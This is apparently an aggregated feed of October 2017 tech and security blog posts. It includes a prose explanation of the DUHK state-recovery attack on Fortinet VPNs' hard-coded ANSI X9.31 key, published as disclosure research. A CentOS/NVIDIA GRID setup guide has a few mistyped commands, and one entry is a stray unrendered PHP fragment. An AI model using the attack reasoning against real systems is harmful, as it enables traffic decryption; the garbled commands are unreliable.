There’s a lot of tech spaces that are designed to help connect people from groups who are underrepresented in tech. Some tech groups are for “women” or “girls” (which can sometimes mean young women, and sometimes means adult women). It’s unclear whether non-binary folks are included in such groups, which puts me in the awkward position of asking all the groups I’m currently involved in if this is still a space for me.

I recommend reading Kat’s post on the design of gender-inclusive tech spaces. If you run a group or event targeted at gender minorities in tech, consider what you mean by “women only” and whether you want to be more inclusive towards non-binary folks that also want a space away from the patriarchy.

I know that in the past, a lot of folks looked up to me as ‘a woman in open source’. Some people felt I was a role model, and some people felt triumphant that I overcame a lot of sexism and a toxic environment to do some pretty badass technical work. Guess what? I’m still a badass. As a non-binary person, I’m still a minority gender in tech. So I’m still going to continue to be my badass self, taking on the patriarchy.

Promote Pronouns

When you meet someone, don’t assume what their pronouns are. As an ally, you can help by introducing yourself and normalizing pronoun usage. E.g. “Hi, my name is Victor, and I use he/him pronouns.”

If you’re a conference organizer, make sure all your name tags have a space for pronoun stickers. Have sheets of pronoun stickers at registration, and make sure the registration volunteers point out the pronoun badge stickers. If someone is confused about what the pronouns are, have a handout on pronouns and gender ready to give them. Wiscon is a conference that does a very good job with pronouns.

Don’t print pronouns collected from the registration system on badges without permission, or force everyone to put a pronoun on their badge. Some people might use different pronouns in conversation with different people, for example, if a person is “out” as non-binary to some friends but not their coworkers. Some people are genderfluid (meaning their feelings about their gender may change over time, even day to day). Some people might be questioning their gender, and not know what pronouns they want yet. Some people may prefer not to have a pronoun sticker at all.

The best practice is to provide space for people who want to provide their pronouns, but don’t force it on everyone.

What if people misgender you?

Some people who knew me under my old name might get confused when you use my new name. It’s perfectly fine to remind them of past work I did under my old name, while emphasizing my new name and pronouns. For example:

“Sage Sharp? Who’s that?”

“Sage is a diversity and inclusion consultant with Otter Tech. They were a Linux kernel developer for 10 years and wrote the USB 3.0 driver. They help run the Outreachy internship program.”

“Oh, you mean Sarah Sharp?”

“Yeah. They changed their name to Sage and they use ‘they’ pronouns now.”

I know it might be hard for people who have known me to get used to my new name and pronoun. You might even slip up in conversation with me. That’s ok, just correct the word and move on with your conversation. No need to apologize or call attention to it. We’re all humans, and retraining the language centers of our brains takes time. As long as I can see you’re trying, we’re cool.

What about your old accounts?

The internet never forgets. There will be old pictures of me, articles about me under my old name, etc. I’m fine with that, because that’s all a part of my past, who I was and the experiences that make me who I am. It’s as much a part of who I am as the tattoo on my arm. I don’t feel sad or weird looking at old pictures of myself. Seeing my longer haircut or myself in more feminine clothing can be surprising because I’ve changed so much, but after that initial reaction what I feel most is empathy for my past self.

At the same time, I’m also not that person any more. I’d like to see current pictures of me with my current name and correct pronoun.

If you see a news article that uses my old name, please let them know about my new name and pronouns. (But if it’s some troll site, don’t engage.) Several photos of my new style can be found here. If you see a social media website that uses my old name, don’t bother emailing me about it. I might have abandoned it, or found the name/gender change process to be too complex. Speaking of email, my old email addresses will still work, but I’ll respond back with my new email address. Please update your phone and email contacts to use the name ‘Sage Sharp’.

Phew, that was a lot to process!

We’ll keep it simple. Hi, my name is Sage Sharp, and I use ‘they’ pronouns. It’s nice to meet you!

by Sage at October 24, 2017 05:00 PM

OpenSSL

Steve Henson

For as long as I have been involved in the OpenSSL project there has been one constant presence: Steve Henson. In fact he has been a part of the project since it was founded and he is the number 1 committer of all time (by a wide margin). I recall the first few times I had any dealings with him being somewhat in awe of his encyclopaedic knowledge of OpenSSL and all things crypto. Over the years Steve has made very many significant contributions both in terms of code but also in terms of being an active member of the management team.

I am sad to have to report that Steve has decided, for personal reasons, to move on to other things. The OpenSSL Management Committee (OMC) would like to wish him all the best for the future. In recognition of his huge contributions we will be listing him as an “OMC Emeritus” on our alumni page.

Good luck Steve!

October 24, 2017 01:00 AM

October 23, 2017

Cryptography Engineering

Attack of the week: DUHK

Before we get started, fair warning: this is going to be a post about a fairly absurd (but non-trivial!) attack on cryptographic systems. But that’s ok, because it’s based on a fairly absurd vulnerability.

This work comes from Nadia Heninger, Shaanan Cohney and myself, and follows up on some work we’ve been doing to look into the security of pseudorandom number generation in deployed cryptographic devices. We made a “fun” web page about it and came up with a silly logo. But since this affects something like 25,000 deployed Fortinet devices, the whole thing is actually kind of depressing.

The paper is called “Practical state recovery attacks against legacy RNG implementation“, and it attacks an old vulnerability in a pseudorandom number generator called ANSI X9.31, which is used in a lot of government certified products. The TL;DR is that this ANSI generator really sucks, and is easy to misuse. Worse, when it’s misused — as it has been — some very bad things can happen to the cryptography that relies on it.

First, some background.

What is an ANSI, and why should I care?

A pseudorandom number generator (PRG) is a deterministic algorithm designed to “stretch” a short random seed into a large number of apparently random numbers. These algorithms are used ubiquitously in cryptographic software to supply all of the random bits that our protocols demand.

PRGs are so important, in fact, that the U.S. government has gone to some lengths to standardize them. Today there are three generators approved for use in the U.S. (FIPS) Cryptographic Module Validation Program. Up until 2016, there were four. This last one, which is called the ANSI X9.31 generator, is the one we’re going to talk about here.

ANSI X9.31 is a legacy pseudorandom generator based on a block cipher, typically AES. It takes as its initial seed a pair of values (K, V) where K is a key and V is an initial “seed” (or “state”). The generator now produces a long stream of pseudorandom bits by repeatedly applying the block cipher in the crazy arrangement below:

A single round of the ANSI X9.31 generator instantiated using AES. The Ti value is a “timestamp”, usually generated using the system clock. Ri (at right) represents the output of the generator. The state Vi is updated at each round. However, the key K is fixed throughout the whole process, and never updates.

The diagram above illustrates one of the funny properties of the ANSI generator: namely, that while the state value V updates for each iteration of the generator, the key K never changes. It remains fixed throughout the entire process.

And this is a problem. Nearly twenty years ago, Kelsey, Schneier, Wagner and Hall pointed out that this fact makes the ANSI generator terribly insecure in the event that an attacker should ever learn the key K.

Specifically, if an attacker were to obtain K somehow, and then was able to learn only a single 16-byte raw output block (Ri) from a working PRG, she could do the following: (1) guess the timestamp T, (2) work backwards (decrypting using K) in order to recover the corresponding state value V, and now (3) run the generator forwards or backwards (with guesses for T) to obtain every previous and subsequent output of the generator.

Thus, if an application uses the ANSI generator to produce something like a random nonce (something that is typically sent in a protocol in cleartext), and also uses the generator to produce secret keys, this means an attacker could potentially recover those secret keys and completely break the protocol.

Of course, all of this requires that somehow the attacker learns the secret value K. At the time Kelsey et al. published their result, this was viewed as highly unlikely. After all, we’re really good at keeping secrets.

I assume you’re joking?

So far we’ve established that the ANSI generator is only secure if you can forever secure the value K. However, this seems fairly reasonable. Surely implementers won’t go around leaking their critical secrets all over the place. And certainly not in government-validated cryptographic modules. That would be crazy.

Yet crazy things do happen. We figured someone should probably check.

To see how the X9.31 key is managed in real products, our team developed a sophisticated analytic technique called “making a graduate student read every FIPS document on the CMVP website”. 

Most of the documents were fairly vague. And yet, a small handful of widely-used cryptographic modules had language that was troubling. Specifically, several vendors include language in their security policy that indicates the ANSI key was either hard-coded, or at least installed in a factory — as opposed to being freshly generated at each device startup.

Of even more concern: at least one of the hard-coded vendors was Fortinet, a very popular and successful maker of VPN devices and firewalls.

To get more specific, it turns out that starting (apparently in 2009, or perhaps earlier), every FortiOS 4.x device has shipped with a hardcoded value for K. This key has been involved in generating virtually every random bit used to establish VPN connections on those appliances, using both the TLS and IPSec protocols. The implication is that anyone with the resources to simply reverse-engineer the FortiOS firmware (between 2009 and today) could theoretically have been able to recover K themselves — and thus passively decrypt any VPN connection.

(Note: Independent of our work, the ANSI generator was replaced with a more secure alternative as of FortiOS 5.x. As a result of our disclosure, it has also been patched in FortiOS 4.3.19. There are still lots of unpatched firewalls out there, however.)

What does the attack look like?

Running an attack against a VPN device requires three ingredients. The first is the key K, which can be recovered from the FortiOS firmware using a bit of elbow grease. Shaanan Cohney (the aforementioned graduate student) was able to pull it out with a bit of effort.

Next, the attacker must have access to some VPN or TLS traffic. It’s important to note that this is not an active attack. All you really need is a network position that’s capable of monitoring full two-sided TLS or IPSec VPN connections.

Specifically, the attacker needs a full AES block (16 bytes) worth of output from the ANSI generator, plus part of a second block to check success against. Fortunately both TLS and IPSec (IKE) include nonces of sufficient length to obtain this output, and both are drawn from the ANSI generator, which lives in the FortiOS kernel. The attacker also needs the Diffie-Hellman ephemeral public keys, which are part of the protocol transcript.

Finally, you need to know the timestamp Ti that was used to operate the generator. In FortiOS, these timestamps have a 1-microsecond resolution, so guessing them is actually a bit of a challenge. Fortunately, TLS and other protocols include the time-in-seconds as one of the outputs of the TLS protocol, so the actually guessing space is typically only about 2^20 at most. Still, this guessing proves to be one of the most costly elements of the attack.

Given all of the ingredients above, the attacker now decrypts the output block taken from the protocol nonce using K, guesses each possible Ti value, and then winds forward or backwards until she finds the random bits that were used to generate that party’s Diffie-Hellman secret key. Fortunately, the key and nonce are generated one after the other, so this is not quite as painful as it sounds. But it is fairly time consuming. Fortunately, computers are fast, so this is not a dealbreaker.

With the secret key in hand, it’s possible to fully decrypt the VPN connection, read all traffic, and modify the data as needed.

Does the attack really work?

Since we’re not the NSA, it’s awfully hard for us to actually apply this attack to real Fortinet VPN connections in the wild. Not to mention that it would be somewhat unethical.

However, there’s nothing really unethical about scanning for FortiOS devices that are online and willing to accept incoming traffic from the Internet. To validate the attack, the team conducted a large-scale scan of the entire IPv4 address space. Each time we found a device that appeared to present as a FortiOS 4.x VPN, we initiated a connection with it and tested to see if we could break our own connection.

It turns out that there are a lot of FortiOS 4.x devices in the wild. Unfortunately, only a small number of them accept normal IPSec connections from strangers. Fortunately, however, a lot of them do accept TLS connections. Both protocol implementations use the same ANSI generator for their random numbers.

This scan allowed us to validate that — as of  October 2017 — the vulnerability was present and exploitable on more than 25,000 Fortinet devices across the Internet. And this count is likely conservative, since these were simply the devices that bothered to answer us when we scanned. A more sophisticated adversary like a nation-state would have access to existing VPN connections in flight.

In short, if you’re using a legacy Fortinet VPN you should probably patch.

So what does it all mean?

There are really three lessons to be learned from a bug like this one.

The first is that people make mistakes. We should probably design our crypto and certification processes to anticipate that, and make it much harder for these mistakes to become catastrophic decryption vulnerabilities like the one in FortiOS 4.x. Enough said.

The second is that government crypto certifications are largely worthless. I realize that seems like a big conclusion to draw from a single vulnerability. But this isn’t just a single vendor — it’s potentially several vendors that all fell prey to the same well-known 20-year old vulnerability. When a vulnerability is old enough to vote, your testing labs should be finding it. If they’re not finding things like this, what value are they adding?

Finally, there’s a lesson here about government standards. ANSI X9.31 (and its cousin X9.17) is over twenty years old. It’s (fortunately) been deprecated as of 2016, but a huge number of products still use it. This algorithm should have disappeared ten years earlier — and yet here we are. It’s almost certain that this small Fortinet vulnerability is just the tip of the iceberg. Following on revelations of a possible deliberate backdoor in the Dual EC generator, none of this stuff looks good. It’s time to give serious thought to how we make cryptographic devices resilient — even against the people who are supposed to be helping us secure them.

But that’s a topic for a much longer post.

 


by Matthew Green at October 23, 2017 06:28 PM

The FreeBSD Diary

' . htmlentities($myrow["name"]) . '

' . htmlentities($myrow["description"]) . '

October 23, 2017 02:18 AM

October 21, 2017

TaoSecurity

How to Minimize Leaking

I am hopeful that President Trump will not block release of the remaining classified documents addressing the 1963 assassination of President John F. Kennedy. I grew up a Roman Catholic in Massachusetts, so President Kennedy always fascinated me.

The 1991 Oliver Stone movie JFK fueled several years of hobbyist research into the assassination. (It's unfortunate the movie was so loaded with fictional content!) On the 30th anniversary of JFK's death in 1993, I led a moment of silence from the balcony of the Air Force Academy chow hall during noon meal. While stationed at Goodfellow AFB in Texas, Mrs B and I visited Dealey Plaza in Dallas and the Sixth Floor Museum.

Many years later, thanks to a 1992 law partially inspired by the Stone movie, the government has a chance to release the last classified assassination records. As a historian and former member of the intelligence community, I hope all of the documents become public. This would be a small but significant step towards minimizing the culture of information leaking in Washington, DC. If prospective leakers were part of a system that was known for releasing classified information prudently, regularly, and efficiently, it would decrease the leakers' motivation to evade the formal declassification process.

Many smart people have recommended improvements to the classification system. Check out this 2012 report for details.

by Richard Bejtlich (noreply@blogger.com) at October 21, 2017 07:43 PM

Electricmonk.nl

Umatrix makes the web usable again

As happens with all media, once corporations join in because there is money to be made, things quickly devolve into a flaming heap of shit. The internet is no exception to this rule. With the coming of Javascript and DHTML in the late 90's, ads soon started appearing on the web. Not long after, pop-ups – either with or without ads – became a common sighting. This set off a back-and-forth war of browsers trying to block annoyances such as pop-ups and advertisers coming up with innovative ways to annoy the crap out of everybody. What started with still images of ads, much like you'd have on traditional paper, soon changed into a moving, blinking, automatically playing audio and video crapfest.

Because the basics underlying the web are insecure-by-design, it is possible for browsers to make requests to any website in the world from any website you decide to visit. This of course was quickly picked up by content publishers, the media and advertisers alike, to track your every move on the internet in order to shove more lukewarm shit down the throats of the average consumer.

The rise and fall of ad blockers

The answer to this came in the form of Ad blockers: separate programs or extensions you install in your browser. They have a predefined list of ad domains that they'll block from loading. Naturally this upset the media and advertisers, some of whom equate it with stealing. One has to wonder if ignoring ads in the newspaper is also considered stealing. At any rate, it's hard to be sympathetic with the poor thirsty vampires in the advertising industry. They've shown again and again that they can't self-regulate their own actions.  They'll go through great lengths to annoying you into buying their crap and violating your privacy in the most horrible ways, all for a few extra eyeballs *.

Unfortunately, much like how the zombies refuse to stay dead once slain, so do the annoying features on the web. For the past few years the media, content producers, advertisers and basically everybody else have decided to redouble their efforts in the Annoyance Wars with such things as Javascript / HTML5 pop-ups begging to sign up to their newsletters, automatically playing HTML5 videos, auto-loading of (or worse: redirecting to) the next article, detection of adblockers, bitcoin mining Javascript software running in the background when you visit a site, ever increasing and deeper tracking, super cookies, tracking pixels, the use of CDNs, etc.

For example, CNN's site loads resources from a staggering 61 domains. That's 61 places that can track you. 30 of those are known to track you and include Facebook, Google, a variety of specialized trackers, ad agencies, etc. It tries to run over 40 scripts and tries to place 8 cookies. And this is only from allowing scripts! I did not allow cross-site background requests or any of the blocked domains. I'm sure if I unblocked those, there would be much, much more.

To top it all off, advertisers have decided to go to the root of the problem, and have simply bought most ad blockers. These were then modified to let through certain "approved" ads. The sales pitch they give us is that they'll only allow nonintrusive ads. Kinda like a fifty-times convicted felon telling the parole board that he'll truly be good this time. In some cases they've even built tracking software directly in the ad blockers themselves. In other cases they're basically extorting money from websites in exchange for letting their ads through.

Bringing out the big guns

So… our ad blockers are being taken over by the enemy. Our browsers are highly insecure by default. Every site can send and retrieve data from any place on the web. Browsers can use our cameras, microphones and GPUs. The most recent addition is the ability to show notifications on our desktops. A feature that, surprise surprise, was quickly picked up by sites to shove more of their crap in our faces.  Things are only going to get worse as browsers get more and more access to our PCs. The media has shown that they don't give a rats ass about your privacy or rights as long as there's a few cents to make. The world's most-used browser is built by a company that lives off advertising. Have we lost the war? Do we just resign ourselves to the fact that we'll be tracked, spied upon, lied to, taken advantage of and spoon-fed advertisements like obedient little consumers every time we open a webpage?

No.

Enter umatrix

Umatrix is like a firewall for your browser. It stops web pages from doing anything. They can't set cookies, they can't load CSS or images. They can't run scripts, use iframes or send data to themselves or to other sites. Umatrix blocks everything. Umatrix is what browsers should be doing by default. Ad blockers are just not enough. They only block ads and then only the ones they know about. To get any decent kind of protection of your privacy, you always needed at least an Adblocker, a privacy blocker such as Privacy Badger and a script blocker such as Noscript. Umatrix replaces all of those, and does a better job at it too.

Umatrix gives you full insight into what a website is trying to do. It gives you complete control over what a website is and isn't allowed to do. It has a bit of a learning curve, which is why I wrote a tutorial for it.

When you just start out using umatrix, you'll find that many sites don't work properly. On the other hand, many sites work a lot better. If you take a little time to unblock things so that your favorite sites work again (and save those changes), you'll notice within a few hours that it's not so bad. Umatrix is still for technical users and even those might find it too much of a chore. I find it worth the small effort to unblock things if that means my privacy stays intact. And more importantly, I'm never annoyed anymore by ads or pop-ups, plus I'm much less likely to accidentally run some malicious javascript.

This is what a CNN article looks like with Umatrix enabled and only allows first-party (*.cnn.com) CSS and images, which I have set as the default:

Look at that beauty. It's clean. It loads super fast. It cannnot track me. It's free of ads, pop-ups, auto playing videos, scripts and cookies. Remember, this didn't take any manual unblocking. This is just what it looks like out of the box with umatrix.

Umatrix makes the web usable again.

Get it, install it, love it

Get it for FirefoxChrome or Opera. Umatrix is Open Source, so it cannot be bought out by ad agencies.

Read my tutorial to get started with umatrix, as the learning curve is fairly steep.

Thanks for reading and safe browsing!

 

 

*) Someone will probably bring up the whole "but content creators should / need / deserve money too!" argument again. I'm not interested in discussions about that. They've had the chance to behave, and they've misbehaved time and time again. At some point, you don't trust the pathological liars anymore. No content creator switched to a more decent ad provider that doesn't fuck its customers over. The blame is on them, not on the people blocking their tracking, spying, attention-grabbing shit. Don't want me looking at your content for free? Put up a paywall. People won't come to your site anymore if you did that? Then maybe your content wasn't worth money in the first place.

by admin at October 21, 2017 01:46 PM

Colin Percival

FreeBSD/EC2: Community vs. Marketplace AMIs

FreeBSD has been available in Amazon EC2 since FreeBSD 9.0 (January 2012), and from FreeBSD 10.2 (August 2015) AMIs have been built by the FreeBSD release enginering team as part of the regular release process. Release announcements go out with a block of text about where to find FreeBSD in EC2, for example (taken from the FreeBSD 11.1 release announcement):
   FreeBSD 11.1-RELEASE amd64 is also available on these cloud hosting
   platforms:

     * Amazon(R) EC2(TM):
       AMIs are available in the following regions:

         ap-south-1 region: ami-8a760ee5
         eu-west-2 region: ami-f2425396
         eu-west-1 region: ami-5302ec2a
         ap-northeast-2 region: ami-f575ab9b
         ap-northeast-1 region: ami-0a50b66c
         sa-east-1 region: ami-9ad8acf6
         ca-central-1 region: ami-622e9106
         ap-southeast-1 region: ami-6d75e50e
         ap-southeast-2 region: ami-bda2bede
         eu-central-1 region: ami-7588251a
         us-east-1 region: ami-70504266
         us-east-2 region: ami-0d725268
         us-west-1 region: ami-8b0128eb
         us-west-2 region: ami-dda7bea4

       AMIs will also available in the Amazon(R) Marketplace once they have
       completed third-party specific validation at:
       https://aws.amazon.com/marketplace/pp/B01LWSWRED/
This leads to a question I am frequently asked: Which way should FreeBSD users launch their instances? The answer, as usual, is "it depends". Here are some of the advantages of each option, to help you decide which to use.

October 21, 2017 12:45 AM

October 20, 2017

Sean's IT Blog

The Virtual Horizon Podcast Episode 1 – A Conversation with Matt Heldstab

VMUG Leader Matt Heldstab joins me to talk about the VMUG EUC Explore event and community involvement.

 

Podcast music is a derivative of
Boogie Woogie Bed by Jason Shaw (audionatix.com)
Licensed under Creative Commons: By Attribution 3.0 License
http://creativecommons.org/licenses/by/3.0/

 


by seanpmassey at October 20, 2017 01:15 PM

October 18, 2017

Sean's IT Blog

Configuring a Headless CentOS Virtual Machine for NVIDIA GRID vGPU #blogtober

When IT administrators think of GPUs, the first thing that comes to mind for many is gaming.  But GPUs also have business applications.  They’re mainly found in high end workstations to support graphics intensive applications like 3D CAD and medical imaging.

But GPUs will have other uses in the enterprise.  Many of the emerging technologies, such as artificial intelligence and deep learning, utilize GPUs to perform compute operations.  These will start finding their way into the data center, either as part of line-of-business applications or as part of IT operations tools.  This could also allow the business to utilize GRID environments after hours for other forms of data processing.

This guide will show you how to build headless virtual machines that can take advantage of NVIDIA GRID vGPU for GPU compute and CUDA.  In order to do this, you will need to have a Pascal Series NVIDIA Tesla card such as the P4, P40, or P100 and the GRID 5.0 drivers.  The GRID components will also need to be configured in your hypervisor, and you will need to have the GRID drivers for Linux.

I’ll be using CentOS 7.x for this guide.  My base CentOS configuration is a minimal install with no graphical shell and a few additional packages like Nano and Open VM Tools.  I use Bob Planker’s guide for preparing my VM as a template.

The steps for setting up a headless CentOS VM with GRID are:

  1. Deploy your CentOS VM.  This can be from an existing template or installed from scratch.  This VM should not have a graphical shell installed, or it should be in a run mode that does not execute the GUI.
  2. Attach a GRID profile to the virtual machine by adding a shared PCI device in vCenter.  The selected profile will need to be one of the Virtual Workstation profiles, and these all end with a Q.
  3. GRID requires a 100% memory reservation.  When you add an NVIDIA GRID shared PCI device, there will be an associated prompt to reserve all system memory.
  4. Update the VM to ensure all applications and components are the latest version using the following command:
    yum update -y
  5. In order to build the GRID driver for Linux, you will need to install a few additional packages.  Install these packages with the following command:
    yum install -y epel-release dkms libstdc++.i686 gcc kernel-devel 
  6. Copy the Linux GRID drivers to your VM using a tool like WinSCP.  I generally place the files in /tmp.
  7. Make the driver package executable with the following command:
    chmod +X NVIDIA-Linux-x86_64-384.73-grid.run
  8. Execute the driver package.  When we execute this, we will also be adding the –dkms flag to support Dynamic Kernel Module Support.  This will enable the system to automatically recompile the driver whenever a kernel update is installed.  The commands to run the the driver install are:
    bash ./NVIDIA-Linux-x86_64-384.73-grid.run –dkms
  9. When prompted, select yes to register the kernel module sources with DKMS by selecting Yes and pressing Enter.
  10. You may receive an error about the installer not being able to locate the X Server path.  Click OK.  It is safe to ignore this error.
  11. Install the 32-bit Compatibility Libraries by selecting Yes and pressing Enter.
  12. At this point, the installer will start to build the DKMS module and install the driver.  
  13. After the install completes, you will be prompted to use the nvidia-xconfig utility to update your X Server configuration.  X Server should not be installed because this is a headless machine, so select No and press Enter.
  14. The install is complete.  Press Enter to exit the installer.
  15. To validate that the NVIDIA drivers are installed and running properly, run nvidia-smi to get the status of the video card.  
  16. Next, we’ll need to configure GRID licensing.  We’ll need to create the GRID licensing file from a template supplied by NVIDIA with the following command:
    cp  /etc/nvidia/gridd.conf.template  /etc/nvidia/gridd.conf
  17. Edit the GRID licensing file using the text editor of your choice.  I prefer Nano, so the command I would use is:
    nano  /etc/nvidia/gridd.conf
  18. Fill in the ServerAddress and BackupServerAddress fields with the fully-qualified domain name or IP addresses of your licensing servers.
  19. Set the FeatureType to 2 to configure the system to retrieve a Virtual Workstation license.  The Virtual Workstation license is required to support the CUDA features for GPU Compute.
  20. Save the license file.
  21. Restart the GRID Service with the following command:
    service nvidia-gridd restart
  22. Validate that the machine retrieved a license with the following command:
    grep gridd /var/log/messages
  23. Download the NVIDIA CUDA Toolkit.
    wget https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run
  24. Make the toolkit installer executable.
    chmod +x cuda_9.0.176_384.81_linux-run.sh
  25. Execute the CUDA Toolkit installer.
    bash cuda_9.0.176_384.81_linux-run.sh
  26. Accept the EULA.
  27. You will be prompted to download the CUDA Driver.  Press N to decline the new driver. This driver does not match the NVIDIA GRID driver version, and it will break the NVIDIA setup.  The GRID driver in the VM has to match the GRID software that is installed in the hypervisor.
  28. When prompted to install the CUDA 9.0 toolkit, press Y.
  29. Accept the Default Location for the CUDA toolkit.
  30. When prompted to create a symlink at /usr/local/cuda, press Y.
  31. When prompted to install the CUDA 9.0 samples, press Y.
  32. Accept the default location for the samples.
  33. Reboot the virtual machine.
  34. Log in and run nvidia-smi again.  Validate that you get the table output similar to step 15.  If you do not receive this, and you get an error, it means that you likely installed the driver that is included with the CUDA toolkit.  If that happens, you will need to start over.

At this point, you have a headless VM with the NVIDIA Drivers and CUDA Toolkit installed.  So what can you do with this?  Just about anything that requires CUDA.  You can experiment with deep learning frameworks like Tensorflow, build virtual render nodes for tools like Blender, or even use Matlab for GPU compute.


by seanpmassey at October 18, 2017 04:04 PM

HolisticInfoSec.org

McRee added to ISSA's Honor Roll for Lifetime Achievement

HolisticInfoSec's Russ McRee was pleased to be added to ISSA International's Honor Roll this month, a lifetime achievement award recognizing an individual's sustained contributions to the information security community, the advancement of the association and enhancement of the professionalism of the membership.
According to the press release:
"Russ McRee has a strong history in the information security as a teacher, practitioner and writer. He is responsible for 107 technical papers published in the ISSA Journal under his Toolsmith byline in 2006-2015. These articles represent a body of knowledge for the hands-on practitioner that is second to none. These titles span an extremely wide range of deep network security topics. Russ has been an invited speaker at the key international computer security venues including DEFCON, Derby Con, BlueHat, Black Hat, SANSFIRE, RSA, and ISSA International."
Russ greatly appreciates this honor and would like to extend congratulations to the ten other ISSA 2017 award winners. Sincere gratitude to Briana and Erin McRee, Irvalene Moni, Eric Griswold, Steve Lynch, and Thom Barrie for their extensive support over these many years.

by Russ McRee (noreply@blogger.com) at October 18, 2017 04:35 AM

toolsmith #128 - DFIR Redefined: Deeper Functionality for Investigators with R - Part 1

“To competently perform rectifying security service, two critical incident response elements are necessary: information and organization.” ~ Robert E. Davis

I've been presenting DFIR Redefined: Deeper Functionality for Investigators with R across the country at various conference venues and thought it would helpful to provide details for readers.
The basic premise?
Incident responders and investigators need all the help they can get.
Let me lay just a few statistics on you, from Secure360.org's The Challenges of Incident Response, Nov 2016. Per their respondents in a survey of security professionals:
  • 38% reported an increase in the number of hours devoted to incident response
  • 42% reported an increase in the volume of incident response data collected
  • 39% indicated an increase in the volume of security alerts
In short, according to Nathan Burke, “It’s just not mathematically possible for companies to hire a large enough staff to investigate tens of thousands of alerts per month, nor would it make sense.”
The 2017 SANS Incident Response Survey, compiled by Matt Bromiley in June, reminds us that “2016 brought unprecedented events that impacted the cyber security industry, including a myriad of events that raised issues with multiple nation-state attackers, a tumultuous election and numerous government investigations.” Further, "seemingly continuous leaks and data dumps brought new concerns about malware, privacy and government overreach to the surface.”
Finally, the survey shows that IR teams are:
  • Detecting the attackers faster than before, with a drastic improvement in dwell time
  • Containing incidents more rapidly
  • Relying more on in-house detection and remediation mechanisms
To that end, what concepts and methods further enable handlers and investigators as they continue to strive for faster detection and containment? Data science and visualization sure can’t hurt. How can we be more creative to achieve “deeper functionality”? I propose a two-part series on Deeper Functionality for Investigators with R with the following DFIR Redefined scenarios:
  • Have you been pwned?
  • Visualization for malicious Windows Event Id sequences
  • How do your potential attackers feel, or can you identify an attacker via sentiment analysis?
  • Fast Frugal Trees (decision trees) for prioritizing criticality
R is “100% focused and built for statistical data analysis and visualization” and “makes it remarkably simple to run extensive statistical analysis on your data and then generate informative and appealing visualizations with just a few lines of code.”

With R you can interface with data via file ingestion, database connection, APIs and benefit from a wide range of packages and strong community investment.
From the Win-Vector Blog, per John Mount “not all R users consider themselves to be expert programmers (many are happy calling themselves analysts). R is often used in collaborative projects where there are varying levels of programming expertise.”
I propose that this represents the vast majority of us, we're not expert programmers, data scientists, or statisticians. More likely, we're security analysts re-using code for our own purposes, be it red team or blue team. With a very few lines of R investigators might be more quickly able to reach conclusions.
All the code described in the post can be found on my GitHub.

Have you been pwned?

This scenario I covered in an earlier post, I'll refer you to Toolsmith Release Advisory: Steph Locke's HIBPwned R package.

Visualization for malicious Windows Event Id sequences

Windows Events by Event ID present excellent sequenced visualization opportunities. A hypothetical scenario for this visualization might include multiple failed logon attempts (4625) followed by a successful logon (4624), then various malicious sequences. A fantastic reference paper built on these principle is Intrusion Detection Using Indicators of Compromise Based on Best Practices and Windows Event Logs. An additional opportunity for such sequence visualization includes Windows processes by parent/children. One R library particularly well suited to is TraMineR: Trajectory Miner for R. This package is for mining, describing and visualizing sequences of states or events, and more generally discrete sequence data. It's primary aim is the analysis of biographical longitudinal data in the social sciences, such as data describing careers or family trajectories, and a BUNCH of other categorical sequence data. Somehow though, the project page somehow fails to mention malicious Windows Event ID sequences. :-) Consider Figures 1 and 2 as retrieved from above mentioned paper. Figure 1 are text sequence descriptions, followed by their related Windows Event IDs in Figure 2.

Figure 1
Figure 2
Taking related log data, parsing and counting it for visualization with R would look something like Figure 3.

Figure 3
How much R code does it take to visualize this data with a beautiful, interactive sunburst visualization? Three lines, not counting white space and comments, as seen in the video below.


A screen capture of the resulting sunburst also follows as Figure 4.

Figure 4


How do your potential attackers feel, or can you identify an attacker via sentiment analysis?

Do certain adversaries or adversarial communities use social media? Yes
As such, can social media serve as an early warning system, if not an actual sensor? Yes
Are certain adversaries, at times, so unaware of OpSec on social media that you can actually locate them or correlate against other geo data? Yes
Some excellent R code to assess Twitter data with includes Jeff Gentry's twitteR and rtweet to interface with the Twitter API.
  • twitteR: provides access to the Twitter API. Most functionality of the API is supported, with a bias towards API calls that are more useful in data analysis as opposed to daily interaction.
  • Rtweet: R client for interacting with Twitter’s REST and stream API’s.
The code and concepts here are drawn directly from Michael Levy, PhD UC Davis: Playing With Twitter.
Here's the scenario: DDoS attacks from hacktivist or chaos groups.
Attacker groups often use associated hashtags and handles and the minions that want to be "part of" often retweet and use the hashtag(s). Individual attackers either freely give themselves away, or often become easily identifiable or associated, via Twitter. As such, here's a walk-through of analysis techniques that may help identify or better understand the motives of certain adversaries and adversary groups. I don't use actual adversary handles here, for obvious reasons. I instead used a DDoS news cycle and journalist/bloggers handles as exemplars. For this example I followed the trail of the WireX botnet, comprised mainly of Android mobile devices utilized to launch a high-impact DDoS extortion campaign against multiple organizations in the travel and hospitality sector in August 2017. I started with three related hashtags: 
  1. #DDOS 
  2. #Android 
  3. #WireX
We start with all related Tweets by day and time of day. The code is succinct and efficient, as noted in Figure 5.

Figure 5
The result is a pair of graphs color coded by tweets and retweets per Figure 6.

Figure 6

This gives you an immediate feels for spikes in interest by day as well as time of day, particularly with attention to retweets.
Want to see what platforms potential adversaries might be tweeting from? No problem, code in Figure 7.
Figure 7

The result in the scenario ironically indicates that the majority of related tweets using our hashtags of interest are coming from Androids per Figure 8. :-)


Figure 8
Now to the analysis of emotional valence, or the "the intrinsic attractiveness (positive valence) or averseness (negative valence) of an event, object, or situation."
orig$text[which.max(orig$emotionalValence)] tells us that the most positive tweet is "A bunch of Internet tech companies had to work together to clean up #WireX #Android #DDoS #botnet."
orig$text[which.min(orig$emotionalValence)] tells us that "Dangerous #WireX #Android #DDoS #Botnet Killed by #SecurityGiants" is the most negative tweet.
Interesting right? Almost exactly the same message, but very different valence.
How do we measure emotional valence changes over the day? Four lines later...
filter(orig, mday(created) == 29) %>%
  ggplot(aes(created, emotionalValence)) +
  geom_point() + 
  geom_smooth(span = .5)
...and we have Figure 9, which tell us that most tweets about WireX were emotionally neutral on 29 AUG 2017, around 0800 we saw one positive tweet, a more negative tweets overall in the morning.

Figure 9
Another line of questioning to consider: which tweets are more often retweeted, positive or negative? As you can imagine with information security focused topics, negativity wins the day.
Three lines of R...
ggplot(orig, aes(x = emotionalValence, y = retweetCount)) +
  geom_point(position = 'jitter') +
  geom_smooth()
...and we learn just how popular negative tweets are in Figure 10.

Figure 10
